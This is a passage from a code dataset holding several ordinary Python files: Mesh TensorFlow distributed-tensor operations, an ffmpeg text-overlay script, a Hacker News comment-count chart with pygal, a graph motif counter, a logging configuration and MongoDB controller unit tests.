list(six.itervalues(kwargs)):\n if not isinstance(x, list) or len(x) != len(devices):\n raise ValueError(\n \"Argument not a list with same length as devices \"\n \"arg=%s devices=%s %s %s\" % (x, devices, len(x), len(devices)))\n ret = []\n for i, device in enumerate(devices):\n with tf.device(device):\n with tf.variable_scope(\"parallel_%d\" % i):\n my_args = [x[i] for x in args]\n my_kwargs = {k: v[i] for k, v in six.iteritems(kwargs)}\n ret.append(fn(*my_args, **my_kwargs))\n return ret\n\n\ndef transpose_list_of_lists(lol):\n \"\"\"Transpose a list of equally-sized python lists.\n\n Args:\n lol: a list of lists\n Returns:\n a list of lists\n Raises:\n ValueError: if list is empty\n \"\"\"\n if not lol:\n raise ValueError(\"cannot transpose the empty list\")\n return [list(x) for x in zip(*lol)]\n\n\ndef binary_reduction_fn(reduction_fn_string):\n if reduction_fn_string == \"SUM\":\n return tf.add\n elif reduction_fn_string == \"MAX\":\n return tf.maximum\n elif reduction_fn_string == \"MIN\":\n return tf.minimum\n else:\n raise ValueError(\"Unknown reduction_fn_string %s\" % reduction_fn_string)\n\n\ndef reduction_fn(reduction_fn_string):\n if reduction_fn_string == \"SUM\":\n return tf.reduce_sum\n elif reduction_fn_string == \"MAX\":\n return tf.reduce_max\n elif reduction_fn_string == \"MIN\":\n return tf.reduce_min\n else:\n raise ValueError(\"Unknown reduction_fn_string %s\" % reduction_fn_string)\n\n\nclass MtfCheckpointSaverListener(tf.train.CheckpointSaverListener):\n \"\"\"Copy slices to masters before saving.\"\"\"\n\n def __init__(self, lowering):\n self._op = lowering.copy_slices_to_masters()\n\n def begin(self):\n # You can add ops to the graph here.\n tf.logging.info(\"Starting the session.\")\n\n def before_save(self, session, global_step_value):\n # assigns\n tf.logging.info(\"Before Save.\")\n session.run(self._op)\n tf.logging.info(\"About to write a checkpoint\")\n\n def after_save(self, session, global_step_value):\n tf.logging.info(\"Done writing checkpoint.\")\n\n def end(self, session, global_step_value):\n tf.logging.info(\"Done with the session.\")\n\n\nclass MtfRestoreHook(tf.train.SessionRunHook):\n \"\"\"Copy masters to slices after restoring.\"\"\"\n\n def __init__(self, lowering):\n self._lowering = lowering\n\n def begin(self):\n self._op = self._lowering.copy_masters_to_slices()\n\n def after_create_session(self, session, coord):\n session.run(self._op)\n\n\nclass RandomOperation(Operation):\n \"\"\"Random operation such as tf.random_uniform.\"\"\"\n\n def __init__(self, mesh, shape, tf_fn, **kwargs):\n super(RandomOperation, self).__init__(\n [], mesh=mesh, name=kwargs.get(\"name\", \"random\"))\n self._tf_fn = tf_fn\n self._kwargs = kwargs\n self._outputs = [Tensor(self, shape, kwargs.get(\"dtype\", tf.float32))]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n output_shape = self.outputs[0].shape\n lowering.set_tensor_lowering(self.outputs[0], (\n mesh_impl.random(output_shape, self._tf_fn, self._kwargs)))\n\n\ndef random_uniform(mesh, shape, **kwargs):\n \"\"\"Random uniform.\n\n Args:\n mesh: a Mesh\n shape: a Shape\n **kwargs: keyword args for tf.random_uniform, except seed\n\n Returns:\n a Tensor\n \"\"\"\n shape = convert_to_shape(shape)\n return RandomOperation(mesh, shape, tf.random_uniform, **kwargs).outputs[0]\n\n\ndef dropout(x, keep_prob, noise_shape=None, name=None):\n \"\"\"Dropout layer.\n\n Args:\n x: a Tensor\n keep_prob: a float between 0.0 and 1.0\n noise_shape: an optional Shape (a subset of x.shape)\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n noise_shape = convert_to_shape(noise_shape)\n if noise_shape is None:\n noise_shape = x.shape\n with tf.variable_scope(name, default_name=\"dropout\"):\n if keep_prob == 1.0:\n return x\n noise = cast(less(random_uniform(\n x.mesh, noise_shape, dtype=x.dtype), keep_prob), x.dtype)\n noise /= keep_prob\n return x * noise\n\n\ndef _cumprod(l):\n \"\"\"Cumulative product of a list.\n\n Args:\n l: a list of integers\n Returns:\n a list with one more element (starting with 1)\n \"\"\"\n ret = [1]\n for item in l:\n ret.append(ret[-1] * item)\n return ret\n\n\ndef log_variable_sizes(var_list, tag, verbose=True):\n \"\"\"Log the sizes and shapes of variables, and the total size.\n\n Args:\n var_list: a list of variables; defaults to trainable_variables\n tag: a string; defaults to \"Trainable Variables\"\n verbose: bool, if True, log every weight; otherwise, log total size only.\n \"\"\"\n if not var_list:\n return\n\n name_to_var = {v.name: v for v in var_list}\n total_size = 0\n for v_name in sorted(list(name_to_var)):\n v = name_to_var[v_name]\n v_size = v.shape.size\n if verbose:\n tf.logging.info(\"Weight %s\\tshape %s\\tsize %d\",\n v.name.ljust(80),\n str(v.shape).ljust(30), v_size)\n total_size += v_size\n tf.logging.info(\"%s Total size: %d\", tag, total_size)\n\n\nclass WhileLoopOperation(Operation):\n \"\"\"While loop.\"\"\"\n\n def __init__(self, cond_fn, body_fn, inputs,\n tf_kwargs=None, name=\"while_loop\"):\n super(WhileLoopOperation, self).__init__(\n inputs, mesh=inputs[0].mesh, name=name)\n self._cond_fn = cond_fn\n self._body_fn = body_fn\n self._tf_kwargs = tf_kwargs or {}\n assert not self._tf_kwargs.get(\"back_prop\", False)\n ops = self.graph.operations\n before = len(ops)\n def make_placeholders(name):\n return [Tensor(self, t.shape, t.dtype, name=\"%s_%d\" % (name, i))\n for i, t in enumerate(inputs)]\n self._cond_inputs = make_placeholders(\"cond_input\")\n self._cond_output = self._cond_fn(*self._cond_inputs)\n self._cond_ops = ops[before:]\n del ops[before:]\n self._body_inputs = make_placeholders(\"body_input\")\n self._body_outputs = self._body_fn(*self._body_inputs)\n for (i, (inp, body_out)) in enumerate(zip(inputs, self._body_outputs)):\n if inp.shape != body_out.shape:\n raise ValueError(\n \"shape mismatch i=%d inp=%s body_out=%s\" % (i, inp, body_out))\n self._body_ops = ops[before:]\n del ops[before:]\n self._outputs = make_placeholders(\"output\")\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n def tf_cond_fn(*tf_inputs):\n for tf_inp, mtf_inp in zip(tf_inputs, self._cond_inputs):\n lowering.tensors[mtf_inp] = mesh_impl.LaidOutTensor(tf_inp)\n for op in self._cond_ops:\n with tf.name_scope(op.name):\n op.lower(lowering)\n lowered_output = lowering.tensors[self._cond_output]\n ret = lowered_output.to_laid_out_tensor().tensor_list[0]\n return ret\n\n def tf_body_fn(*tf_inputs):\n for tf_inp, mtf_inp in zip(tf_inputs, self._body_inputs):\n lowering.tensors[mtf_inp] = mesh_impl.LaidOutTensor(tf_inp)\n for op in self._body_ops:\n with tf.name_scope(op.name):\n op.lower(lowering)\n return [\n lowering.tensors[mtf_out].to_laid_out_tensor().tensor_list\n for mtf_out in self._body_outputs]\n\n lowered_inputs = [\n lowering.tensors[t].to_laid_out_tensor().tensor_list\n for t in self.inputs]\n\n tf_outs = tf.while_loop(tf_cond_fn,\n tf_body_fn,\n lowered_inputs,\n back_prop=False,\n **self._tf_kwargs)\n for tf_out, mtf_out in zip(tf_outs, self._outputs):\n lowering.set_tensor_lowering(mtf_out, mesh_impl.LaidOutTensor(tf_out))\n\n\ndef while_loop(cond_fn, body_fn, inputs, num_loop_vars=None, **kwargs):\n \"\"\"While Loop.\n\n num_loop_vars is a hack for the multi-gpu setup. In this case, loops\n are generally slow, as all loop variables are placed on device. By setting\n num_loop_vars=k, then all of the loop variables except for the first k\n are handled as mtf Variables instead of loop variables, using explicit\n updates and control dependencies. In this case, we only return the\n first num_loop_vars outputs. Do not use this option on TPU, since it\n is unnecessary and also produces incorrect results, since xla does not\n respect control dependencies.\n\n Args:\n cond_fn: a function from n Tensors to scalar boolean Tensor\n body_fn: a function from n Tensors to n Tensors\n inputs: a list of n Tensors\n num_loop_vars: an optional integer.\n **kwargs: additional kwargs passed to tf.while_loop\n\n Returns:\n a list of n Tensors.\n \"\"\"\n if num_loop_vars is None:\n return WhileLoopOperation(cond_fn, body_fn, inputs, kwargs).outputs\n # Turn all loop vars except for the first ones into non-loop vars.\n # see comments in docstring.\n assert num_loop_vars > 0\n extra_inputs = inputs[num_loop_vars:]\n my_vars = tuple([get_variable(\n x.mesh, \"loop_var_%d\" % i,\n x.shape, initializer=tf.zeros_initializer(),\n dtype=x.dtype,\n collections=[tf.GraphKeys.LOCAL_VARIABLES])\n for i, x in enumerate(extra_inputs)])\n first_input = depend(\n inputs[0], [assign(var, x) for var, x in zip(my_vars, extra_inputs)])\n inputs = [first_input] + inputs[1:num_loop_vars]\n def my_cond_fn(*inputs):\n return cond_fn(*(inputs + my_vars))\n def my_body_fn(*inputs):\n outputs = tuple(body_fn(*(inputs + my_vars)))\n extra_outputs = outputs[num_loop_vars:]\n first_output = depend(\n outputs[0], [assign(var, x) for var, x in zip(my_vars, extra_outputs)])\n outputs = (first_output,) + outputs[1:num_loop_vars]\n return outputs\n return WhileLoopOperation(\n my_cond_fn, my_body_fn, inputs, kwargs).outputs\n\n\ndef where(condition, if_true, if_false):\n dtype = if_true.dtype\n return (\n if_true * cast(condition, dtype) +\n if_false * cast(logical_not(condition), dtype))\n\n\ndef _shape_union(shapes):\n \"\"\"A shape containing the union of all dimensions in the input shapes.\n\n Args:\n shapes: a list of Shapes\n\n Returns:\n a Shape\n \"\"\"\n return Shape(list(set(sum([s.dims for s in shapes], []))))\n\n\ndef _tf_flatten_batch_dims(x, num_nonbatch_dims):\n \"\"\"Flatten all but last num_nonbatch_dims into one dimension.\n\n Args:\n x: a tf.Tensor:\n num_nonbatch_dims: an integer\n\n Returns:\n a tf.Tensor with 1 + num_nonbatch_dims dimensions.\n \"\"\"\n shape = x.shape.as_list()\n assert None not in shape\n new_shape = ([list_product(shape[:-num_nonbatch_dims])]\n + shape[-num_nonbatch_dims:])\n if new_shape != shape:\n x = tf.reshape(x, new_shape)\n return x\n\n\ndef _tf_restore_batch_dims(x, num_nonbatch_dims, prototype):\n \"\"\"Reverse op of _tf_flatten_batch_dims.\n\n Un-flatten the first dimension of x to match all but the last\n num_nonbatch_dims dimensions of prototype.\n\n Args:\n x: a tf.Tensor with 1 + num_nonbatch_dims dimensions\n num_nonbatch_dims: an integer\n prototype: a tf.Tensor\n\n Returns:\n a tf.Tensor\n \"\"\"\n assert x.shape.ndims == 1 + num_nonbatch_dims\n new_shape = (\n prototype.shape.as_list()[:-num_nonbatch_dims] + x.shape.as_list()[1:])\n assert None not in new_shape\n if new_shape != x.shape.as_list():\n x = tf.reshape(x, new_shape)\n return x\n\n\ndef halo_exchange(x, blocks_dim, block_size_dim, halo_size, wrap=False):\n \"\"\"Concat each block with the margins of adjacent blocks.\n\n Get left and right blocks_dim and concatenate along block_size_dim.\n\n Args:\n x: a Tensor.\n blocks_dim: a Dimension in x.shape\n block_size_dim: a Dimension in x.shape\n halo_size: an integer\n wrap: a boolean\n\n Returns:\n a Tensor with the same shape as x, other than in block_size_dim, whose\n size is increased by 2*halo_size.\n \"\"\"\n if halo_size == 0:\n return x\n\n block_size = block_size_dim.size\n partial_size = halo_size % block_size\n num_complete_blocks = halo_size // block_size\n parts = [x]\n\n for i in xrange(1, num_complete_blocks + 1):\n parts = ([shift(x, i, blocks_dim, wrap)] + parts +\n [shift(x, -i, blocks_dim, wrap)])\n if partial_size > 0:\n left_margin = slice(x, 0, partial_size, block_size_dim.name)\n right_margin = slice(x, block_size_dim.size - partial_size, partial_size,\n block_size_dim.name)\n parts = (\n [shift(right_margin, num_complete_blocks + 1, blocks_dim, wrap)]\n + parts +\n [shift(left_margin, -(num_complete_blocks + 1), blocks_dim, wrap)])\n return concat(parts, block_size_dim.name)\n\n\ndef conv2d_with_blocks(\n conv_input,\n conv_filter,\n strides,\n padding,\n h_blocks_dim=None,\n w_blocks_dim=None,\n name=None):\n \"\"\"conv2d operation with spatial partitioning.\n\n Spatial partitioning is implemented by decomposing the image into blocks.\n Block dimensions represented as h_blocks_dim and w_blocks_dim can be split\n along the mesh axis. If split, then we do a halo exchange where each block\n receives the part of the image from its left and right neighbors necessary to\n do the convolution. Exchange can involve complete or partial blocks depending\n on the filter height and width.\n\n Currently, only \"SAME\" padding with dilation rate of 1 is supported.\n\n Args:\n conv_input: a Tensor of shape\n [batch, h_blocks_dim, w_blocks_dim, h_dim, w_dim, in_channels_dim]\n conv_filter: a Tensor of shape\n [filter_height, filter_width, in_channels_dim, out_channels_dim]\n strides: A list of ints. 1-D tensor of length 4.\n padding: string, \"SAME\". The type of padding algorithm to use.\n Valid is not currently supported.\n h_blocks_dim: Dimension representing number of height blocks.\n w_blocks_dim: Dimension representing number of height blocks.\n name: A name for the operation (optional).\n\n Returns:\n A Tensor of shape\n [batch, h_blocks_dim, w_blocks_dim, h_dim, w_dim, out_channels_dim]\n \"\"\"\n filter_h_dim, filter_w_dim = conv_filter.shape.dims[:2]\n assert filter_h_dim.size % 2 == 1\n assert filter_w_dim.size % 2 == 1\n h_dim, w_dim = conv_input.shape.dims[-3:-1]\n\n # If h_blocks_dim and w_blocks_dim is not split, directly call conv2d.\n if h_blocks_dim is None and w_blocks_dim is None:\n return conv2d(conv_input, conv_filter, strides, padding, name)\n\n # Padding 'VALID' is not supported yet.\n if padding != \"SAME\":\n raise NotImplementedError(\"conv2d_with_blocks requires padding=SAME\")\n\n # Halo exchange for h_blocks and w_blocks.\n for blocks_dim, block_size_dim, halo_size in [\n (h_blocks_dim, h_dim, filter_h_dim.size // 2),\n (w_blocks_dim, w_dim, filter_w_dim.size // 2)]:\n if halo_size > 0:\n if blocks_dim is not None:\n conv_input = halo_exchange(\n conv_input, blocks_dim, block_size_dim, halo_size)\n else:\n conv_input = pad(\n conv_input, [halo_size, halo_size], block_size_dim.name)\n return conv2d(conv_input, conv_filter, strides, \"VALID\", name)\n","repo_name":"Sanqiang/text_simplification","sub_path":"tensor2tensor/mesh_tensorflow/mesh_tensorflow.py","file_name":"mesh_tensorflow.py","file_ext":"py","file_size_in_byte":126593,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"70"}
+{"seq_id":"72801003108","text":"import ffmpeg\ninput = ffmpeg.input('https://ma7moud3ly.github.io/video.mp4')\n\ntext=input.drawtext(text='Pink Python ^_^',\nfontcolor='red',\nfontsize=30,\nbox=1,\nboxcolor='black@0.5',\nx='(w-text_w)/2',\ny='(h-text_h)/2'\n)\n\ntext=text.drawtext(text='By Mahmoud Aly',\nfontcolor='white',\nfontsize=15,\nx='(w-text_w)/2',\ny='((h-text_h)/2)+30'\n)\n\noutput=ffmpeg.output(text, 'text.mp4')\nffmpeg.run(output,overwrite_output=True)\n\n","repo_name":"Ma7moud3ly/pink-python","sub_path":"scripts/packages/ffmpeg4.py","file_name":"ffmpeg4.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"70"}
+{"seq_id":"34002820520","text":"import requests\nfrom operator import itemgetter\nimport pygal\nfrom pygal.style import LightenStyle as LS , LightColorizedStyle as LCS\n\n# Wykonanie zapytania API i zachgwania otrzymanej odpowiedzi.\nurl = 'https://hacker-news.firebaseio.com/v0/topstories.json'\nr = requests.get(url)\nprint(\"Kod stanu:\", r.status_code)\n\n#Przetworzenie informacji o każdym artykule\n\nsubmission_ids = r.json()\nsubmission_dicts = []\n\nfor submission_id in submission_ids[:30]:\n # Przygotowanie oddzielnego wywołania API dla każdego artykułu.\n url = ('https://hacker-news.firebaseio.com/v0/item/' + str(submission_id) + '.json')\n submission_r = requests.get(url)\n print(submission_r.status_code)\n response_dict = submission_r.json()\n\n submission_dict = {\n 'title' : response_dict['title'],\n 'link' : 'http://news.ycombinator.com/item?id=' + str(submission_id),\n 'comments' : response_dict.get('descendants', 0)\n }\n submission_dicts.append(submission_dict)\n\nsubmission_dicts = sorted(submission_dicts, key = itemgetter('comments'), reverse=True)\n\nfor submission_dict in submission_dicts:\n print(\"\\nTytuł artykułu: \", submission_dict['title'])\n print(\"Łącze dyskusji: \", submission_dict['link'])\n print(\"Liczba Komentarzy: \", submission_dict['comments'])\n\ntitle, plot_discts = [], []\nfor submission_dict in submission_dicts:\n title.append(submission_dict['title'])\n\n plot_dict = {\n 'value': submission_dict['comments'],\n 'xlink': submission_dict['link']\n }\n plot_discts.append(plot_dict)\n\n\n\n# Utworzenie wizualizacji.\nmy_style = LS('#336699', base_style=LCS)\n\nmy_config = pygal.Config()\nmy_config.x_label_rotation = 45\nmy_config.show_legend = False\nmy_config.title_font_size = 24\nmy_config.label_font_size = 14\nmy_config.major_label_font_size = 18\nmy_config.truncate_label = 15\nmy_config.show_y_guides = False\nmy_config.width = 1000\n\nchart = pygal.Bar(my_config, style=my_style)\nchart.force_uri_protocol = 'http'\nchart.title = \"Najpopularniejsze ze względu na liczbę komentarzy, posty na stronie internetowej https://hacker-news.firebaseio.com \"\nchart.x_labels = title\n\nchart.add('', plot_discts)\nchart.render_to_file('hn_submissions.svg')","repo_name":"ahilon/Python-matplotlib-API-pygal","sub_path":"API/RequestApiHackerNews/hn_submissions.py","file_name":"hn_submissions.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41044670130","text":"import itertools\r\nfrom tqdm import tqdm\r\nimport networkx as nx\r\n\r\n\r\n# count all the motifs in a graph of size n\r\ndef countMotifs(graph, size):\r\n allMotifs = []\r\n motifCount = 0\r\n for i in tqdm(range(size-1, size*(size-1)+1)):\r\n curMotifs = [] # tuple that contains graphs and their motifs count\r\n combinations = [list(x) for x in itertools.combinations(graph.edges(), i)] # all edges combinations\r\n for combination in combinations:\r\n curGraph = nx.DiGraph()\r\n curGraph.add_edges_from(combination)\r\n if len(curGraph.nodes) != size:\r\n continue\r\n if not nx.is_connected(curGraph.to_undirected()):\r\n continue\r\n is_isomorphic = any(nx.is_isomorphic(contender[0], curGraph) for contender in curMotifs)\r\n if is_isomorphic:\r\n for j, contender in enumerate(curMotifs):\r\n if nx.is_isomorphic(contender[0], curGraph):\r\n temp = list(curMotifs[j])\r\n temp[1] += 1\r\n curMotifs[j] = tuple(temp)\r\n break\r\n else:\r\n curMotifs.append((curGraph, 1))\r\n motifCount += 1\r\n allMotifs.append(curMotifs)\r\n\r\n return allMotifs, motifCount\r\n\r\n# print graph edges\r\ndef printMotifs(edges):\r\n strToPrint = \"\"\r\n for edge in edges:\r\n strToPrint += f\"{edge[0]} {edge[1]}\\n\"\r\n return strToPrint\r\n\r\n\r\ndef printToTerminal(motifs, count):\r\n strToPrint = \"\"\r\n i = 1\r\n strToPrint += f\"count={count}\\n\"\r\n strToPrint += f\"total motifs={count}\\n\"\r\n for lst in motifs:\r\n for motif in lst:\r\n strToPrint += f\"#{i}\\n\"\r\n strToPrint += f\"count={motif[1]}\\n\"\r\n i += 1\r\n strToPrint += printMotifs(motif[0].edges)\r\n print(strToPrint)\r\n\r\n\r\n# parse the graph and start the program\r\ndef parseAndStart(graph_str, n):\r\n edges_str_arr = graph_str.split(\"\\n\")\r\n new_edges = [(int(edge.split(\" \")[0]), int(edge.split(\" \")[1])) for edge in edges_str_arr if edge]\r\n # create a graph\r\n g = nx.DiGraph()\r\n g.add_edges_from(new_edges)\r\n # count motifs\r\n motifs, count = countMotifs(g, n)\r\n # print to terminal\r\n printToTerminal(motifs, count)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # get n from user\r\n n = int(input(\"Enter the value of n: \"))\r\n # get graph from file\r\n with open(\"input.txt\", \"r\") as file:\r\n graph_str = file.read()\r\n # parse and start\r\n parseAndStart(graph_str, n)\r\n\r\n\r\n","repo_name":"YanaiLevi/BioComp","sub_path":"ex2q2.py","file_name":"ex2q2.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18440148085","text":"import logging.config\n\nfrom ebonite.config import Logging\n\nLOG_LEVEL = logging._nameToLevel.get(Logging.LOG_LEVEL, logging.DEBUG)\n\nlogging_config = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'\n },\n },\n 'handlers': {\n 'default': {\n 'level': LOG_LEVEL,\n 'formatter': 'standard',\n 'class': 'logging.StreamHandler',\n 'stream': 'ext://sys.stdout',\n },\n },\n 'loggers': {\n 'ebonite': {\n 'handlers': ['default'],\n 'level': LOG_LEVEL,\n },\n 'ebonite_runtime': {\n 'handlers': ['default'],\n 'level': LOG_LEVEL\n }\n }\n}\n\nlogging.config.dictConfig(logging_config)\n\nlogger = logging.getLogger('ebonite')\nrlogger = logging.getLogger('ebonite_runtime')\n","repo_name":"zyfra/ebonite","sub_path":"src/ebonite/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"69"}
+{"seq_id":"11156736442","text":"#!/usr/bin/python\n#-*-coding: utf-8-*-\n \nfrom lector import *\nfrom gui import *\n \n \n \ndef main():\n app = QtGui.QApplication(sys.argv)\n main_window = MainWindow()\n sys.exit(app.exec_())\n \nif __name__ == '__main__':\n main()","repo_name":"MartinezLopez/gestor_libros","sub_path":"gestor_libros/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35327884820","text":"# -*- coding: utf-8 -*-\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest # NOQA\n\nimport os\nimport sys\nfrom tests.base import MongoTestCase\nimport json\nimport time\nfrom random import randint\nfrom bson import ObjectId\nimport models\nimport controllers\nfrom models.extensions import validate, validate_partial, doc_remove_empty_keys\nfrom schematics.serialize import to_python\nfrom utils import myyaml\n\nclass TestGenericMongo(MongoTestCase):\n def post_sample(self, doc):\n response = controllers.Generic(self.g).post(**{'docs': [doc]})\n assert response['status'] == 200\n return response['response']['docs'][0]['doc']\n def test_post_attr(self):\n '''Post a new item to a listType attribute/field\n '''\n db = self.g['db']\n usr = self.g['usr'] \n generic = controllers.Generic(self.g)\n\n # lets create a some sample docs bypassing tmp process.\n sample_doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'Stooge'})\n \n test_field = 'emails'\n test_field_c = 'Email'\n test_values = [{'typ': 'work', '_c': test_field_c, 'address': 'bill@ms.com', 'prim': '1'},\n {'typ': 'home', '_c': test_field_c, 'address': 'steve@apple.com', 'note': 'Deceased'}] \n for test_value in test_values:\n generic.post_attr(sample_doc, test_field, test_field_c, test_value, useTmpDoc=False) \n \n doc = db['cnts'].find_one({'_id': sample_doc['_id']})\n \n # should now have correct count\n assert len(doc[test_field]) == len(test_values)\n def post_sample_Prs(self):\n\n db = self.g['db']\n usr = self.g['usr']\n \n generic = controllers.Generic(self.g)\n\n cnts = myyaml.pyObj(self.tests_data_yaml_dir + 'cnts.yaml')\n prs_larry_stooge = cnts['larry_stooge']\n \n response = controllers.Generic(self.g).post(**{'docs': [prs_larry_stooge]})\n assert response['status'] == 200\n sample_doc = response['response']['docs'][0]['doc']\n return db['cnts'].find_one({'_id': sample_doc['_id']})\n \n ## lets create a some sample docs bypassing tmp process.\n #sample_doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'Stooge'})\n \n ## EMAILS\n #test_field = 'emails'\n #test_field_c = 'Email'\n #test_values = [{'typ': 'work', '_c': test_field_c, 'address': 'bill@ms.com', 'prim': '1'},\n #{'typ': 'home', '_c': test_field_c, 'address': 'steve@apple.com', 'note': 'Deceased'}] \n #for test_value in test_values:\n #generic.post_attr(sample_doc, test_field, test_field_c, test_value, useTmpDoc=False) \n \n ## TELS\n #test_field = 'tels'\n #test_field_c = 'Tel'\n #test_values = [{'typ': 'work', '_c': test_field_c, 'text': '(123) 456-7890', 'prim': '1'},\n #{'typ': 'home', '_c': test_field_c, 'text': '(890) 123-4567', 'note': 'assistant: Sue'}]\n #for test_value in test_values:\n #generic.post_attr(sample_doc, test_field, test_field_c, test_value, useTmpDoc=False) \n \n ## NOTES\n #test_field = 'notes'\n #test_field_c = 'Note'\n #test_values = [{'_c': test_field_c, 'title': 'Dentist Visit', 'note': 'Doctor did cleaning.'},]\n #for test_value in test_values:\n #generic.post_attr(sample_doc, test_field, test_field_c, test_value, useTmpDoc=False) \n\n ## NOTES\n #test_field = 'ims'\n #test_field_c = 'Im'\n #test_values = [{'typ': 'personal', '_c': test_field_c, 'protocol': 'skype', 'address': 'fred_flintstone'},]\n #for test_value in test_values:\n #generic.post_attr(sample_doc, test_field, test_field_c, test_value, useTmpDoc=False) \n\n \n def test_post_listtype(self):\n '''Passing in doc with OID should clone the doc and save in tmp collection. Set isTmp = True.\n '''\n db = self.g['db']\n usr = self.g['usr'] \n generic = controllers.Generic(self.g)\n\n # lets create a some sample docs bypassing tmp process.\n sample_doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'Stooge'})\n\n # now let's pretent to initiate an update of this doc\n response = generic.post(**{'docs': [sample_doc]})\n \n test_field = 'emails'\n test_field_c = 'Email'\n test_values = [{'typ': 'work', '_c': test_field_c, 'address': 'bill@ms.com', 'prim': '1'},\n {'typ': 'home', '_c': test_field_c, 'address': 'steve@apple.com', 'note': 'Deceased'}] \n for test_value in test_values:\n generic.post_attr(sample_doc, test_field, test_field_c, test_value) \n \n # let's get the tmp doc\n tmp_doc_id = sample_doc['_id']\n tmp_doc = db['cnts_tmp'].find_one({'_id': ObjectId(tmp_doc_id)})\n \n # should have the correct number of added attr elements\n assert len(tmp_doc[test_field]) == len(test_values)\n\n # let's submit changes to original source doc.\n response = generic.post(**{'docs': [tmp_doc]})\n doc = response['response']['docs'][0]['doc']\n\n # original doc should now have updated value\n assert doc[test_field][0]['address'] == test_values[0]['address']\n \n # verify that eIds was correctly added\n assert doc['eIds'][test_field] == 3\n def test_put_listtype(self):\n '''Need doc here\n '''\n\n # lets create a some sample docs bypassing tmp process.\n sample_doc = self.post_sample_Prs()\n\n db = self.g['db']\n usr = self.g['usr'] \n generic = controllers.Generic(self.g)\n\n test_field = 'emails'\n test_field_c = 'Email'\n test_values = sample_doc['emails'] \n \n sample_doc_id = sample_doc['_id']\n\n # when we need to edit most docs, we lock the doc and clone a tmp doc to work on.\n # now let's pretent to initiate an update of this doc\n response = generic.post(**{'docs': [sample_doc]})\n \n # this is the temp doc, the original is locked\n doc_tmp = response['response']['docs'][0]['doc']\n\n test_value = [{\n \"_c\" : \"Email\",\n \"eId\" : 2,\n \"address\": \"fred@apple.com\",\n \"typ\" : \"home\",\n \"w\" : 0.0\n }]\n test_eId = 2\n test_elemOffset = 1\n data = {\n \"_c\" : sample_doc['_c'],\n 'where': {'_id': sample_doc['_id'], test_field + '.eId': test_eId},\n 'patch': {\n test_field: test_value,\n },\n \"eId\" : 2\n }\n \n # submit patch to tmp doc\n response = generic.put(**{'data': data})\n tmp_doc = response['response']['doc']\n \n # let's submit changes to original source doc.\n response = generic.post(**{'docs': [tmp_doc]})\n doc = response['response']['docs'][0]['doc']\n\n # original doc should now have updated value\n assert doc[test_field][test_elemOffset]['address'] == test_value[0]['address']\n def test_put(self):\n '''Need doc here\n '''\n db = self.g['db']\n usr = self.g['usr']\n generic = controllers.Generic(self.g)\n\n # lets create a some sample docs bypassing tmp process.\n sample_docs = [\n self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'Stooge'}),\n self.post_sample({'_c': 'Prs', 'fNam': 'Moe', 'lNam': 'Stooge'}),\n self.post_sample({'_c': 'Prs', 'fNam': 'Curley', 'lNam': 'Stooge'}),\n ]\n \n # grab a random doc from sample docs\n sample_doc_offset = randint(0, len(sample_docs) - 1)\n sample_doc = sample_docs[sample_doc_offset]\n sample_doc_id = sample_doc['_id']\n\n # when we need to edit most docs, we lock the doc and clone a tmp doc to work on.\n # now let's pretent to initiate an update of this doc\n response = generic.post(**{'docs': [sample_doc]})\n \n # this is the temp doc, the original is locked\n doc_tmp = response['response']['docs'][0]['doc']\n\n test_field = 'fNam'\n test_value = 'longname'\n data = {\n \"_c\" : sample_doc['_c'],\n 'where': {'_id': sample_doc['_id']},\n 'patch': {\n test_field: test_value,\n \"rBy\" : ObjectId(usr['OID'])\n }\n }\n \n response = generic.put(**{'data': data})\n doc = response['response']['doc']\n \n \n # did it properly update the value?\n assert doc[test_field] == test_value\n \n # let's submit changes to original source doc.\n response = generic.post(**{'docs': [doc]})\n doc = response['response']['docs'][0]['doc']\n\n # original doc should now have updated value\n assert doc[test_field] == test_value\n def test_post_new(self):\n '''Passing in doc with only _c(lass) should initialize a doc and save in tmp collection.\n '''\n sample_doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'King', 'suffix': 'Sr'})\n def test_post_update(self):\n '''Passing in doc with OID should clone the doc and save in tmp collection. Set isTmp = True.\n '''\n db = self.g['db']\n usr = self.g['usr'] \n generic = controllers.Generic(self.g)\n \n # lets create a sample doc bypassing tmp process.\n doc = self.post_sample({'_c': 'Prs', 'fNam': 'Larry', 'lNam': 'King', 'suffix': 'Sr'})\n\n # now let's pretent to initiate an update of this doc\n args = {}\n sample_doc = doc\n args['docs'] = [sample_doc]\n \n response = generic.post(**args)\n \n # let's get the sample source doc that should now have a cloned copy inserted into the tmp collection\n src_doc_id = doc['_id']\n src_doc = db['cnts'].find_one({'_id': ObjectId(src_doc_id)})\n \n # should be locked\n assert src_doc['locked']\n \n assert response['status'] == 200\n data = response['response']\n \n assert data['total_inserted'] == 1\n tmp_doc = data['docs'][0]['doc']\n \n # _id's should match\n assert src_doc['_id'] == tmp_doc['_id']\n \n # should be flagged as tmp\n assert tmp_doc['isTmp']\n def test_post_submit(self):\n '''Passing in doc with OI and isTmp is 